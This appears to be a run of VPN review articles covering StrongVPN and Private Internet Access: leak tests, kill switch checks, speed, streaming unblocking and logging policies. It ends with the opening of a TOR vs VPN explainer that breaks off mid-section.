It would be unusual to provide a standalone DNS service if it didn’t prevent leaks correctly. However, as a precaution, we ran several tests with StrongDNS. Using the guidance from our DNS leak guide, we first tested with DNSleaktest.com, StrongVPN connected, and StrongDNS disabled.

Testing StrongVPN for DNS Leaks

As with many of the best VPNs, StrongVPN seems to have some built-in protection, changing the DNS address in its TAP driver automatically. The only IP that shows is Reliable Hosting's Netherlands server. We got the same result using a separate test by CryptoIP, which displayed an identical address:

CryptoIP DNS leak test showing the same StrongVPN DNS server address

Enabling the StrongDNS tool shows similar results. To test correctly, we set StrongVPN TAP drivers to automatically determine DNS servers. Testing without StrongDNS enabled points to a Dyn DNS from Saudi Arabia. While still a reliable hosting DNS, it isn’t as dedicated or safe:

Testing StrongVPN for DNS leaks without StrongDNS enabled

Enabling the StrongDNS tool has the same effect as correctly configured TAP drivers – it forces the computer to use StrongVPN's dedicated DNS servers.

StrongVPN enabled with StrongDNS passed the DNS leak test

Despite having the same effect, there are some advantages to using the StrongDNS tool. It protects users regardless of the protocol, and changes automatically when StrongVPN phases in and out of different servers.

Despite this, users should still ensure their system is properly configured against DNS leaks. There are several factors in play, each of which is explained in our DNS leak guide.

Kill Switch Protection Test 

The next feature to test was StrongVPN’s Kill Switch. We found the implementation very difficult to test. StrongVPN’s implementation didn’t kick in when simply disabling TAP drivers like other VPNs.

In fact, disabling TAP drivers cut the VPN connection, displaying our true IP, without any indication from the client. This happened despite having “Allow direct traffic while reconnecting” unticked. That’s slightly concerning, and points to a faulty implementation.

Instead, we tried ending the OpenVPN process in Task Manager. This cut the VPN connection once more, but this time the client was able to detect it. However, despite a "reconnecting" dialogue, our true IP still leaked.

Confused, we spoke to support about the matter. An agent confirmed to us that the kill switch functionality is not currently working with StrongVPN:

StrongVPN – Asking Live Chat about the Kill Switch feature

Naturally, we asked if the feature would be fixed anytime soon. The support agent replied, “sorry, we don't have ETA for that task. it may be fixed in one of the next vpn client releases.”

The feature is not advertised by StrongVPN on the site, so the implementation isn’t particularly misleading. However, it’s definitely something to note. You will have to set up a kill switch manually, which is actually far safer than the implementation of even the best VPNs.

Though it can be tricky on some systems, we have extensive guidance in our VPN for torrenting article.

WebRTC Protection Test

Though StrongVPN doesn't protect against connection loss, its WebRTC prevention is very good. For those unfamiliar, WebRTC is a communications protocol. It allows for real-time file and video sharing in the browser without the need for extra plugins. Unfortunately, it also lets websites use JavaScript to discover a user's true IP address, even if they're using a VPN.

Using the StrongDNS tool and ipleak.net, we found no issues with WebRTC. Though it was enabled in our browser, only a Shared Address Space IP was revealed:

StrongVPN protects against WebRTC leaks

Only the best VPNs can provide such functionality and, in this case, it’s thanks to StrongVPN’s dedicated DNS servers. Even with StrongDNS disabled, the service maintained anonymous browsing.

Speed Test and Reliability

Other than anonymity, speed is an important factor in VPN purchases. Encryption always means a slowdown of some sort, but the amount can vary depending on provider. We run tests on all of the best VPN providers to determine the fall off from different locations.

Using the popular Speedtest.net, we first ran a test against the San Jose server from a 100 Mbps UK connection without the VPN enabled. It came back at a solid 89.84 Mb/s.

Speedtest without a VPN

This initial test confirmed we had the ability to utilise almost 100% of our link to the internet.

Next, we enabled our StrongVPN and tried the same test again and the results were staggering:

StrongVPN truly impressed us with its superfast download speeds and low latency

We experienced an expected small drop-off using the San Jose server, down to 82.48 Mb/s, which is really negligible considering our connection had additional overhead due to the heavy encryption, and we also introduced an additional hop (the VPN server) between our location and the San Jose Speedtest.net server.

The round-trip ping came in at only 156ms – that's only a 16ms increase in latency, which is very impressive!

That’s a very fast VPN, with fast downloads/uploads and very low latency while gaming. The download and upload speeds are up there with the best VPNs and certainly fast enough to support any scenario.

StrongVPN Unblocks Netflix, BBC iPlayer, HULU and Region Blocks

The service was able to unblock Netflix successfully. It seems to work with every U.S. server except Miami and Atlanta. Here’s an example from a New York Server:

US Netflix successfully unblocked with StrongVPN

While most of the best VPN providers can unblock Netflix, StrongVPN is particularly impressive. Not only does it work for almost all US servers, it’s also able to unblock Netflix around the globe. In our short testing we were able to access Netflix from the following countries:

  • US
  • UK
  • Australia
  • Canada
  • China
  • Czech Republic
  • Germany
  • Israel
  • Japan
  • Italy
  • Korea
  • Latvia
  • Luxembourg
  • Malaysia
  • Mexico
  • Netherlands
  • Norway
  • Romania
  • Singapore
  • Sweden
  • Switzerland
  • Turkey 

The only notable ones missing were Spain and France. This is the best VPN functionality we’ve seen from any VPN provider we’ve tested. Combined with fast VPN speeds, streaming is quick and available from almost anywhere on the planet.

StrongVPN advises users to report services that are blocked by sending a tracert report. If there’s a genuine problem, they’re usually good at fixing it. 

StrongVPN unblocks BBC iPlayer

The Netflix-unblocking functionality extends to other services. Using a fast VPN connection from the UK, we were able to access BBC iPlayer without any issues. Though it currently only supports less secure protocols, StrongVPN is clearly top of its class at bypassing region blocks. Much of this is down to its StrongDNS tool, which helps to convince websites the connection is genuine.

StrongVPN for Torrenting 

VPNs are popular for torrenting and peer-to-peer downloads and StrongVPN certainly did not disappoint. Using a legal download of Ubuntu, we first tested without the VPN enabled from the UK:

Torrent downloading without VPN enabled

Torrent download speeds were not the greatest despite our fast connection but there are many factors at play here, including variation in healthy peers and ISP bandwidth caps.

We then enabled our StrongVPN connection and re-tested the same download noticing a significant increase in download speed:

Torrent downloading speed increased with StrongVPN enabled

This test also confirms the results we saw during the writing of our VPN for Torrenting article where our download speeds increased from 1.2Mb/sec to 3.1Mb/sec after enabling our StrongVPN client.

As a general rule of thumb, users downloading via torrent should be using a VPN to help ensure their download speeds are not capped by their ISP. While no ISP will admit they are in fact throttling connections, when using a VPN we can clearly see the difference.

StrongVPN's no-log policy also helps ensure user data is not tracked or logged.

VoIP & Video Calls

VoIP and Video calls are one of the toughest tests when it comes to VPNs mainly because VoIP is very sensitive to latency (delay). Generally any one-way delay greater than 150ms (0.15 seconds) will be evident to everyone that’s participating in the call.

We wanted to test StrongVPN under the most extreme conditions so we decided to perform VoIP and video calls from Australia to Australia via a StrongVPN server located in the United States.

StrongVPN VoIP & video call latency test setup (Australia to Australia via a US VPN server)

We connected our mobile VPN client with a StrongVPN server in Washington DC and then launched three different VoIP/Video applications: Viber, Skype and Zoiper. We made VoIP and video calls to users located in Australia forcing packets to travel to the USA and then back to Australia as shown in the diagram above.

The results were surprisingly good: the few delays we experienced were barely noticeable. Video and audio worked great without any issues, and our Viber application continuously reported Excellent Network Quality, even during video calls:

VoIP and Video calls work great with StrongVPN

Does StrongVPN Keep Logs?  

Though StrongVPN has some considerable security features, it can still be compromised if the service keeps logs. When browsing, a user hides behind a VPN’s server IPs. However, logs allow a government agency or copyright holder to discover the user’s true identity via a legal request. This is particularly important for StrongVPN, as it’s based in the US. The US has many surveillance programs and is part of the five-eyes intelligence alliance.

Thankfully, StrongVPN does not keep VPN connection logs of any kind. Its privacy policy reads as follows:

“StrongVPN does not collect or log any traffic or use of its Virtual Private Network service.

We will only comply with all valid subpoena request that follow the letter of the law. We cannot provide information that we do not have. StrongVPN will not participate with any request that is unconstitutional.”

This is a relatively recent change. In the past, StrongVPN was known for keeping logs, both for fourteen days and indefinitely. It’s great to see the service adapting to modern requirements and providing its users with more privacy as a result. Bear in mind the service has been around for 20 years, before the extent of mass surveillance was known. This gives a little leeway to its old policies.

However, even the best VPNs tend to keep logs on their website. StrongVPN is no different in this regard. Reliable Hosting collects cookies, Google analytics, and other such services. This is used to improve the service and isn’t sold to third parties.

Account information is stored too. This includes your billing address, name, email address and more. The logging policy differs depending on the payment method you use, however. StrongVPN does support Bitcoin, which provides significantly more anonymity. You can also use a fake name and email address to circumvent some of these worries.

Support – Response Time and Quality 

StrongVPN says its support is second to none and, in our usage, that was the case. The 24/7 live chat has a strict hierarchy and dedicated tech support, something we haven’t seen with any other service. This was refreshing, as support agents had in-depth knowledge about what they were discussing and how to provide help.

Response times were very quick, and we managed to get in contact with a human within a few minutes, even at peak times. We presented a number of issues, including connection errors and OpenVPN setup. Tech support solved both quickly, and provided more details about the service. They were clearly typing information personally, rather than copying and pasting answers.

StrongVPN also has email support for non-urgent cases. The response is much the same, with detailed, personalized answers in a short time frame. It never took more than a couple of hours to get a reply, which is definitely acceptable when there’s 24/7 support via livechat.

All in all, StrongVPN’s support is exceptional. Naturally, it depends on the support agent but we were impressed with their admittance of broken features, where others would try to skirt around the issue. Though the service might be considered expensive by some, it does come with some of the best VPN support around. 

Value for Money 

On the topic of price, StrongVPN’s value really depends on what you’re using it for. The $3.80 subscription fee is very cheap, and not at all extortionate.

Those who want to bypass region blocks or be safe on public WiFi will be much more suited to this service. It's the best VPN we've seen to unblock Netflix, and is a fast VPN as well. Its offering of 23 countries is more than enough, and platform availability is also a strong point.

Summary 

StrongVPN has changed a lot in recent years, and it's worth keeping an open mind. Its fast download speeds, simple but effective VPN client, strong encryption, zero-log policy and awesome ability to unblock Netflix, Hulu and BBC iPlayer make it a clear winner. And if you aren't happy with the service, StrongVPN still has a five-day money back guarantee.

Visit StrongVPN


Best VPN Review: Private Internet Access (PIA) Features, Pricing, User Experience, Benchmarking & Torrenting

The market for Virtual Private Networks has exploded over the past few years. A wealth of new providers has appeared, promising logless browsing, true anonymity, and fast speeds. Through all that noise, it's becoming increasingly difficult to find the Best VPN for your needs.

Thankfully, there are some established brands that stand above the rest. One of these is Private Internet Access (PIA), launched by London Trust Media in 2010. PIA is very popular for P2P downloads, allowing torrents on every server via secondary VPNs.

In addition, PIA keeps no logs and eliminates DNS leaks, IPv6 leaks, web tracking and malware. It boasts over 3200 servers across 24 countries, as well as a free SOCKS5 proxy.

PIA's VPN Gateways provide thousands of servers across the globe

It’s a fast VPN and quite wide-reaching. All of this comes at a price of only $3.33 (US) a month, though there are a few caveats.

At only $3.33/month US, PIA represents an amazing value for money

Primarily, there is a slightly limited ability to bypass region blocks. PIA might require logging into a few VPN servers to find one that successfully unblocks Netflix or Hulu, but does work without a problem with BBC and other geo-restricted content. Additionally, its popularity means users are more likely to be incorrectly blacklisted from sites.

While the desktop VPN client seems fairly simple, the iOS and Android clients have a more pleasing look and interface. Despite the simplified desktop interface, PIA still remains one of the Best VPNs around, offering great value for money.

Quick overview of VPN features offered by Private Internet Access

PIA VPN Client Installation

Although it may not be the most beautiful VPN client out there, the sign-up and install process for PIA is simple, and the website makes signup and client installation an easy-to-follow process even for novice users. Registration requires only a couple of clicks and an email address. PIA takes care of the password for you, sending your username and login details to that email address. You're also given a link to the client installer for each platform, guides, and a dedicated new-user support thread. It's all fairly fool-proof.

In fact, the install process is so easy that you probably won’t need the support. Users just have to open the file and everything is taken care of. No hitting next, no choosing install locations. A command prompt window opens and installs everything you need.

PIA VPN Client has a simple, yet effective, interface with plenty of useful options

Despite the client's simplistic design, it does provide all the functionality you need in an easy-to-use interface. Connecting to a VPN server can be managed straight from the system tray, and right-clicking offers more options. Its usability is up there with the best VPNs in our review.

VPN Client Platform Availability

This ease of use extends to most of the major platforms. PIA has a Windows and Mac OSX client, as well as an app for iPhone, iPad, and Android smartphones/tablets. Platforms like Windows Mobile do not have a dedicated client, but can utilize the less secure L2TP protocol via settings. In general, we found the apps easy to use, more so than the desktop client. They have a modern GUI and the ability to start the VPN in one click. Without doubt PIA has one of the best VPN apps out there on the mobile platform.

PIA Mobile VPN Client – Great features and easy to use

There's also support for Linux, although the complexity depends on the distribution. Ubuntu 12.04+ is the best supported, and has a dedicated installer that can be run through the terminal:

The PIA Linux VPN Client installation process and login

Most other distributions can install PIA via package manager commands. The exact ones depend on the version of Linux but, generally, it looks something like this:

PIA OpenVPN Client Installation

However, some users are subject to restrictive network policies, causing issues with the dedicated Linux VPN client. In this case, they must use the standalone OpenVPN client. On Linux, this is a bit complex. Though PIA doesn’t have a dedicated support thread, a forum post details the steps for various Debian distributions. It would be good to see a bit more support, but the OpenVPN application isn’t controlled by PIA so it’s forgivable.

PIA OpenVPN (Windows) Client Login

Windows users have an easier time of things. They can use the OpenVPN client by following this guide. All it takes is a simple installer and a configuration file. Naturally, you will not have access to the best VPN features like DNS leak protection, a kill switch, and PIA MACE (Analysed below). However, it does offer a fast VPN service that can bypass network restrictions.

Router VPN Support

Some users find it easier to set up a VPN on their router rather than running VPN clients on every machine. This way, all connections on the network are encrypted by default. Unlike some other VPN providers, PIA does not offer a dedicated application/firmware that users can load on compatible hardware routers, but this can be easily overlooked, as PIA is fully compatible with open-source alternatives such as DD-WRT, Tomato router software and even pfSense.

PIA Tomato VPN setup

The Private Internet Access team has extensive guidance on this, and all three solutions use OpenVPN. It isn't the easiest process, but it's possible with a little effort.

Privacy, Security and Encryption

With a name like Private Internet Access, you would expect PIA to have considerable security. Fortunately, it does live up to its name. It supports PPTP, OpenVPN, and L2TP/IPSec encryption methods. These each have advantages and disadvantages, as stated in our beginner’s guide to VPNs.

By default, PIA utilizes OpenVPN, which is standard for all the best VPNs. Users can choose between AES-128 level encryption and the slower, more secure AES-256. They can also choose between SHA-1 and SHA-256 data authentication, and various handshake methods. You can customize PIA to give maximum protection, none, or somewhere in the middle. Combined with the variety of platforms, these features ensure users can stay safe even on public WiFi.

Private Internet Access also tries to mitigate other security issues. A dedicated PIA MACE setting blocks information leaks due to ads, trackers, and malware. MACE uses a custom DNS server so that requests from unwanted domains return an incorrect IP address. This is a step further than many providers.

PIA also promotes a Kill-Switch feature. When the VPN cuts out or drops, the client disables a user’s internet connection. This is so their real identity is never revealed. What’s more, it reconnects automatically after sleep mode – a handy feature not found on many VPN clients. Although PIA previously had issues with the VPN Auto-Connect feature, this has been resolved in the latest release.

DNS leak worries are addressed too, via a dedicated toggle. Often, OS issues cause a user’s IP address to become public through the Domain Name System. PIA has taken the time to resolve this, despite it being more of an OS issue than a VPN one.

IPv6 leaks are another concern, and the PIA client has protection for those. Again, this is optional, and is off by default. If all that’s still not enough, PIA provides a SOCKS5 proxy that can be layered on top of a VPN connection. This provides no extra encryption, but does further obscure the IP address.

DNS Leak Protection Test

Unfortunately, you can’t always trust what VPN providers put on their websites. Where possible, you should do independent tests of key features. The best VPN providers have security teams consistently testing for vulnerabilities. However, gaps in security can still happen without the provider knowing. As a result, we tested PIA’s functionality, starting with DNS Leak Protection.

First, we used DNSleaktest.com to run an advanced test without DNS Leak Protection enabled. We got the following result:

DNS Leak test without PIA's DNS Leak Protection enabled

The test returned the IP address of the VPN server (Choopla) and our IP address 81.139.58.46 (British Telecom). No surprises there, our OS wasn’t optimized to stop this.

However, PIA's DNS leak protection setting is supposed to mitigate that issue. With the setting enabled, DNSleaktest.com came back with this:

DNS Leak test with PIA's DNS Leak Protection enabled

This time, only the IP address of the VPN shows up. PIA’s feature seems to work perfectly, giving true anonymous browsing. Just to be sure, we tested again using a different site, cyptoip.info.

Initial test was without enabling PIA’s DNS Leak Protection option:

DNS Leak test via cyptoip.info without PIA's DNS Leak Protection enabled

Again, the test confirmed there is a DNS Leak as it returned the IP address of the VPN server (Choopla) and our IP address 81.139.58.46 (British Telecom).

Next, we disconnected from the VPN server, enabled DNS Leak Protection in our VPN client and reconnected to the VPN server. Executing the DNS Leak test provided the following results:

DNS Leak test via cyptoip.info with PIA's DNS Leak Protection enabled

Once more, PIA successfully resolved DNS leak issues. Though we can’t vouch for it on every system, it’s a solid indication. To be certain, users should always modify system settings as per our DNS leak guide.

Kill Switch Protection Test

So, PIA’s DNS leak protection is pretty solid. How about the ‘kill switch’ feature? It’s hard to test consistently, but we didn’t run into any problems. Disconnecting from the VPN immediately turns off the Wi-Fi connection and no web pages will load:

PIA's Kill Switch blocks internet access when not connected to the VPN

However, this doesn’t mean that no leak is occurring. Even slight delays to block internet traffic might cause our IP address to leak for a couple of seconds. To test further, we monitored for any IP changes during connect and disconnect with ipleak.net. We found the real IP address was not displayed at any point. That’s a definite plus that helps keep your identity hidden.

Monitoring for IP leaks with ipleak.net during the PIA Kill Switch test

However, it’s worth noting that PIA’s Kill Switch feature does not work if you use more than one network interface. It can also cause connectivity issues in rare cases. You should only use the feature if you need anonymous browsing, and ought to disable any extra network interfaces.

WebRTC Protection Test

Occasionally, VPNs offer protection against WebRTC. For those unfamiliar, WebRTC is a communications protocol that enables video conferencing and file transfer without extra browser plugins. However, a flaw lets websites discover the true IP address of a user even if they’re using a VPN.

With features like PIA MACE, it can be difficult to tell what is included in "tracking protection." We contacted support, asking what it covers. In regards to WebRTC, we got this response:

“WebRTC is a browser issue, not a VPN problem, and not unique to our service. Mace does not protect from WebRTC.”

Our own tests were shaky. Using the Browserleaks test we did confirm a WebRTC connection in unmodified browsers:

Browserleaks WebRTC test result with PIA enabled

This happens even with PIA’s extra security measures enabled. However, the IP address WebRTC detects seems to point to the VPN server IP, not ours. PIA seems to route STUN requests through its servers to hide the client’s real IP address. So, there does seem to be some protection, but it’s not related to MACE.

However, it’s hard to say how comprehensive this solution is. WebRTC isn’t PIA’s responsibility, as the support agent pointed out. Even the best VPNs can’t substitute for user configuration.

Does Private Internet Access Keep Logs?

PIA provides great security, and it doesn't lie about its features. Still, this functionality is useless if the provider keeps logs. One warrant from law enforcement or the NSA and your private data is in the open. This has happened several times, including with HideMyAss (another VPN provider) in 2011. Private Internet Access claims it does not keep traffic logs and provides true, anonymous browsing.

However, it's difficult to trust a provider's word with so much pressure from law enforcement. In PIA's case we can be quite certain. Court documents from multiple bomb threats in 2016 show the FBI could get no useful information from PIA (see page 12, section 33).

All of the responses from 1&1, Facebook, Twitter, and Tracfone have been traced by IP address back to a company named London Trust Media dba privateinternetaccess.com. This company is an anonymizing company whose purpose is to allow users of the internet to mask their original IP address where they are sending messages from. A subpoena was sent to London Trust Media and the only information they could provide is that the cluster of IP addresses being used was from the east coast of the United States.

That’s a big endorsement, and shows that PIA is trustworthy. It seems unlikely that the FBI wouldn’t pull all the cards for such a serious threat.

While PIA doesn’t keep traffic logs, it does track some aspects of its website usage. Its privacy policy reveals LTM (Private Internet Access) retains email addresses, payment data, and temporary cookies. It also keeps apache web server logs, anonymous Google analytics data, and credit card protection. It seems the “anonymous browsing” claim does not refer to accessing its website.

However, PIA does seem to use this information in a genuine manner. An email address is essential for payment confirmation, and Apache web server logs are “regularly pruned,” with no usernames or passwords involved. Users can also pay by Bitcoin or connect through TOR if they’re concerned.

Despite the London name, PIA is based in the United States. This means considerable scrutiny from law enforcement and other bodies. However, company lawyer John Arsenault says there’s a backup plan if the climate there goes south. From 2012-2013, the company received eleven requests for user data, three of which were from outside the US. Of those, no user data was disclosed.

Speed Test and Reliability

Alongside its privacy features, we found Private Internet Access to be a relatively fast VPN. From the UK, we used speedtest.net’s San Jose, CA server. Without PIA, we got a download speed of 90.26 Mb/s, an upload of 97.40Mb/s, and 140ms ping (latency).

Non-VPN Speed Test with Speedtest.net San Jose

 

A connection with PIA’s closest UK VPN server netted a slight decrease in both download and upload speed:

VPN-Enabled Speed Test with Speedtest.net San Jose

Our download speed took close to a 10% hit, and upload fell by 6.42 Mb/s. That’s quite a fast VPN for all the encryption that’s going on. Ping also fell within the expected range.

In all, PIA provided more than acceptable upload and download speeds. London Trust Media has over 3200 servers across 24 countries. That means coverage isn’t much of an issue, though we’d like to see a few more on the list.

We did, however, experience a few problems with reliability. At times, the speed of servers seemed to drop – likely due to high traffic. However, you can lodge speed complaints straight from the client and they may be resolved. Despite its popularity, Private Internet Access was a fast VPN and, although it sometimes slowed, it never cut out completely.

Private Internet Access for Netflix and Region Blocks

Unfortunately, the popularity does come with some other issues. While some of the best VPNs manage to unblock Netflix, PIA is a little shaky. Anonymous browsing comes at a cost, and connecting from a US California server resulted in the well-known streaming error code F7111-1331-5059.

Netflix appears to regularly identify and remove IP addresses owned by PIA. However, we did manage to unblock Netflix from the US Texas server:

The Magicians, not available on UK Netflix.

So, watching Netflix with PIA is possible, but it may take some searching around to find a VPN server that is not blocked by Netflix. It’s a constant battle between any VPN provider and Netflix, and London Trust Media can’t afford to keep buying new servers. Due to legal issues, support agents are not able to help users unblock Netflix, either. That means you’ll have to test each server manually.

This also applies to the local VPN server (in most cases). We couldn't find a UK server that unblocks Netflix, despite testing from there. As a result, you may have to forego encryption while you watch. Not ideal, but the fault is Netflix's rather than PIA's. In Australia, this wasn't an issue, as the servers haven't been blacklisted yet. The usefulness varies depending on the country.

Thankfully, the issue is also mostly limited to Netflix. We could access BBC iPlayer with ease from the UK London VPN server. It depends entirely on the service and how strictly they police. However, to fully unblock Netflix, you’ll want to check out our Best VPN Guide.

Private Internet Access for Torrenting

Though London Trust Media doesn't support the download of illegal content, nothing is done to stop P2P downloads. We enjoyed a great experience downloading several legal torrents. There was a drop of no more than 1 MB/s, and only slight differences in reliability. Our download speeds without the VPN averaged around 8.7 MB/s, with a drop to 7.7 MB/s after connecting to our PIA VPN.

A BitTorrent download with no VPN enabled

 

BitTorrent downloading using Private Internet Access

 Torrent functionality works on all servers and, on “high-risk” ones, PIA routes traffic through a secondary VPN to further hide IP addresses. In addition, PIA keeps no logs, so it can’t comply with requests from copyright holders.

To verify the safety of P2P downloads with PIA, we ran the ipMagnet test, as per our VPN for torrenting guide. Only the VPN provider was shown, proving that PIA can hide the IP address even during P2P. For further safety, PIA provides a SOCKS5 proxy. Though this doesn’t offer encryption, it does give another layer to hide an IP address. You can see the initial, SOCKS5 IP address, followed by the VPN IP when it was disabled:

ipMagnet test: the SOCKS5 proxy IP is shown first, followed by the VPN IP

All of this makes Private Internet Access an excellent option for torrenting. It should also provide anonymous browsing on torrent sites, and bypass ISP throttling on download. $3.33 for fast VPN torrenting is almost a steal.

Support – Response Time and Quality

No service is infallible, and it’s important to have support services in place. PIA no longer offers a 24/7 live chat service, instead opting for an email system. The average wait time is listed as 4-6 hours.

PIA's advertised average support response time

However, we found this to be significantly less in practice. In three separate support cases, two received replies in exactly half an hour, and the third around 45 minutes. That may not be as fast as a live chat, but it’s acceptable. This may just be to stop users being impatient if replies aren’t instantaneous.

The quality of support was also good. Responses were a mixture of personalized content and copy-pasted guides for extra information. The agents answered questions clearly, were knowledgeable about the product, and even sent follow up emails.

Unfortunately, PIA does not offer phone call support. This may be an issue if you have an urgent problem, but for anything else email should be fine. There’s also a variety of forum posts and FAQs covering a range of topics, so even that may not be necessary. It’s not the best VPN support around but for most users it will be plenty.

Value for Money

Private Internet Access manages to deliver some of the best value for money in the industry. The subscription is cheaper than most VPN providers at $3.33 US per month on a yearly subscription. Other tiers are a lot more expensive, with six months working out to $5.99 a month and one month at $6.95. However, this is still lower than some of our best VPN providers.

Despite the low fee, users still get a complete service. For less than a coffee each month, you get anonymous browsing and torrenting, good support, and more than enough speed. Though the ability to unblock Netflix is limited, there are a few servers that work and PIA can still dodge most geo-blocking. The free SOCKS5 proxy is another plus, allowing users to trade encryption for speed where needed.

Visit PIA VPN

Summary

You're also paying for the brand: not to show off to your friends, but for its certifications and track record. London Trust Media has been around for ten years now, and is one of the few providers with tangible evidence to back up its no-log policy.

However, if users aren’t happy, PIA does have a seven-day money back guarantee. That should be more than enough time, and refunds are given with no questions asked. Unless Netflix blocking is your biggest use, the value for money is unmatched. That amazing price point is why we named Private Internet Access one of the best VPNs this year.


The Ultimate TOR vs VPN Guide – How TOR/VPN Works, Comparing Security, Speeds, Advantages and Disadvantages

Not so long ago, the Internet was very young. Those were the times of the Windows Maze screensaver, of the classic Minesweeper, of grey-and-white MS Paint, and of silvery floppy disks. Gone are those days. Now, having completed its silver jubilee, the Internet has grown into almost a multiverse of information, its network mushrooming every micro-second. But even maturity comes with its own struggles. This enhanced version of the Internet carries its own privacy concerns.

But not to worry: there are plenty of technologies and software developed to preserve your Internet privacy, TOR and VPNs being the popular ones. So here we explore which of the two is the better way to achieve a superior level of privacy on the Internet.

What is Internet Privacy?

What if, at all times, someone were keeping an unseen eye on what you browse on Google, always peering into your messages as you chat with other people? Wouldn't that make you uneasy? Internet privacy is the opposite: whatever information you share, or browsing you do over the Internet, stays only with you until you choose to make it public.

We continually hear about governments and ISPs spying on users and even other countries, which shows how unsafe the internet is. Thankfully, user awareness on internet privacy is continually improving as more and more users seek out bullet-proof methods to encrypt their communications and protect their online privacy.

How TOR Works

TOR, or The Onion Router, is free, open-source software developed and maintained by The Tor Project, a non-profit organisation funded by the US Government. TOR enables users to preserve their anonymity over Internet communications.

To download, simply go to www.TORproject.org. There are two bundles available for download. One is Vidalia, which requires a web browser pre-installed on your system. The other, the TOR Browser Bundle, is preferred as it puts TOR directly onto your system without you having to fulfil any prerequisites or additional installations.

You can download the necessary files for your operating system by visiting: https://www.torproject.org/download/download.html.en

TOR - Onion Routing

TOR employs Onion Routing, a technology developed in the late nineties by a scientist named Paul Syverson. It works at the TCP layer of the network, using a multiple-hop pathway. Whenever a user sends data across the network, TOR creates a relay of nodes (or hops) that decrypts the data, one layer at a time. This is where the TOR vs VPN battle actually takes off.

The relay consists of proxy servers selected at random from the TOR network. When the data travels from the user to the first node, that node decrypts only the IP address of the second node. Similarly, when it reaches the second node, that node decrypts the IP address of the third node, and so on until it reaches the last node. At each node only the information about the next node is decrypted, thus maintaining the anonymity of the user over the entire network. When the data packet reaches the exit node, that node finally decrypts the IP address of the destination server.

The following diagram provides an accurate representation of the Onion Routing method described. Like the layers of an onion, each message (the core of the onion) is covered with layers of encryption. Each layer is removed as it is received by a TOR Node (Router) and then forwarded to the next TOR Node (Router):

Figure 1. TOR Onion Routing method. Each layer is removed by each node to reveal the message

The diagram below is another example which shows how data is exchanged within the TOR network to guarantee privacy and make it almost impossible to track where data packets originate from or the final destination:

How TOR works – Data exchange between TOR nodes and normal non-TOR servers

Note that TOR nodes/users are also able to access normal (non-TOR) websites and hosts in a similar manner.

An example to further clarify the concept: let’s say you want to send a picture to your friend over the internet, without disclosing your location/IP address.

So when you send the picture, your phone, i.e. the Client, creates a data packet that comprises two parts: the Data Payload and the Header. The Data Payload contains your message, in this case the picture, while the Header carries the addressing information, including your (the Client’s) and the recipient’s IP addresses.

Figure 3. Data transfer process without TOR exposes the sender’s & receiver’s IP address

Now, if you are not using TOR, this data packet travels directly to your friend (the receiver). And if your friend is technically inclined, it is fairly easy to read your IP address from the header and, from that, work out your location – the very thing you wanted to keep private.
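To make the header point concrete, the short Python sketch below (illustrative only, using reserved documentation addresses) pulls the sender’s and receiver’s IP addresses straight out of a raw IPv4 header – exactly the information TOR is designed to conceal:

# Sketch: extracting the source and destination IPs from a raw IPv4 header.
# Per RFC 791, the source address sits at bytes 12-15 and the destination at bytes 16-19.
import socket
import struct

def addresses_from_ipv4_header(header: bytes):
    src, dst = struct.unpack("!4s4s", header[12:20])
    return socket.inet_ntoa(src), socket.inet_ntoa(dst)

# A made-up 20-byte header using documentation-only addresses (203.0.113.x, 198.51.100.x)
sample = bytes.fromhex("45000054000040004001f7cb") \
         + socket.inet_aton("203.0.113.10") + socket.inet_aton("198.51.100.7")

print(addresses_from_ipv4_header(sample))   # ('203.0.113.10', '198.51.100.7')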

With TOR, however, an altogether different scene plays out.

With TOR, the data packet from the Client (sender), instead of travelling directly to the Server (receiver), passes through several proxy servers along the way. At each layer, the data packet reveals only as much information as is required to reach the next node, not the nodes that follow. The layers unfold one at a time until the packet safely reaches the destination Server, without the server ever learning your location:

Figure 4. Data transfer via the TOR network guarantees encryption and privacy

In this way TOR doesn’t necessarily erase the client’s footprints, but it makes it far less likely that the server can trace the client’s details. TOR’s strength lies in the number of proxies in the relay. These proxies are servers operated by volunteers connected to the TOR Project, so the more volunteers there are, the stronger TOR’s network becomes.

How VPNs Work (Virtual Private Networks)

Our comprehensive Guide to VPNs covers everything you’ll need to know about VPNs; however, we’ll provide an overview here as well to make it easier to compare VPNs with TOR.

VPNs were created to provide security to users sending data across a public network such as the internet.

Unlike TOR, VPN employs the Client-Server technology with a single hop relay. The intermediate node in the relay is called a VPN Server. A VPN Server acts as a proxy server to transmit data between the client and the internet as shown in the diagram below:

Securely accessing the internet via a VPN Service Provider

A VPN Client is usually a computer, laptop or mobile phone with VPN software installed and a VPN Server is generally located at the organization’s office, in the case of a company-private VPN, or at a large data center in the case of a VPN Service Provider.

Only a VPN Client with the right settings (credentials and VPN Server address) can connect to the VPN Server. A VPN Server combines the hardware and software technologies necessary to host and deliver VPN services over the network. The moment a VPN Client sends a message to connect to the VPN Server, the server will request the client to authenticate. If the credentials are correct, the client connects to the server creating an encrypted tunnel between the two endpoints. Data flowing between the client and VPN server is encrypted, thus preserving the client’s anonymity during the communication.

VPN Service Providers allow you, the client, to connect to their VPN Servers located around the world via VPN, thus encrypting your internet traffic to make it almost impossible to monitor and track.

When the client (you) tries to access a resource on the internet, e.g. a website, instead of sending the request directly to the website – which would reveal your IP address and allow the ISP to monitor the session – the request is encrypted and sent to the VPN Server. The VPN Server then reaches out to the website by forwarding the client’s request; the website, however, sees the request as coming from the VPN Server, not the client. This hides the end client, making it very difficult to track where the request originated.

The same process applies whether you are torrenting, sending and receiving emails, browsing websites or downloading content from the internet. One key point to remember is that when you authenticate in order to access a service, e.g. email, you are in fact disclosing your identity to the end server; however, your location is not revealed.

VPN Protocols

VPNs offer different levels of security depending on the encryption protocol. There are a number of VPN encryption protocols in use today by VPN Providers, and each has its advantages and disadvantages.

Selecting the best VPN Protocol for your mobile device or computer can be a daunting task especially for new users but it can be simplified when you understand a few basic concepts.

While our upcoming extensive guide to the Best VPN Protocol will cover this in great depth, let’s take a quick look at the most commonly used VPN protocols:

PPTP - Point to Point Tunnelling Protocol

PPTP stands for Point to Point Tunnelling Protocol. Developed by Microsoft in the 1990s, PPTP is supported by most operating systems, including Windows, Mac OS and mobile platforms such as Android. It is fast, but at the cost of weak encryption, which means a PPTP VPN can be cracked fairly easily and shouldn’t be used when sending or transmitting sensitive information. PPTP does, however, tend to work well on Wi-Fi hotspots.

L2TP/IPsec – Layer 2 Tunnel Protocol / IPSecurity

